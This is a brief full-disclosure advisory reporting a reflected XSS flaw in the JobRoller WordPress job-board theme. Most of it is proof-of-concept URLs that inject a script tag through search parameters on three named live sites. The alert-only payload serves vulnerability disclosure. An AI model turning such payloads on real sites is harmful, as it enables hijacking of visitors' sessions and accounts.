#Reflected XSS at jobroller - job board for Wordpress
#Vendor: appthemes.com/themes/jobroller/
#Type of report: Full Disclosure(vendor informed at the same time)
Example PoC:
www.nextjobfind.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
pracait.com/?s=tester&location='">&ptype=job_listing&latitude='">&longitude='">&full_address='"><script>alert("Infern0_")</script>&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5'">
myworknet.com/wp/?s=tester&location=%27%22%3E&ptype=job_listing&latitude=%27%22%3E&longitude=%27%22%3E&full_address=%27%22%3E%3Cscript%3Ealert%28%22Infern0_%22%29%3C/script%3E&north_east_lng=&south_west_lng=&north_east_lat=&south_west_lat=&radius=5%27%22%3E
Versions <=1.6.3 seems to be affected(last link)
<=1.5.1 sure are affected.
Regards,
Dawid `Infern0_` Balut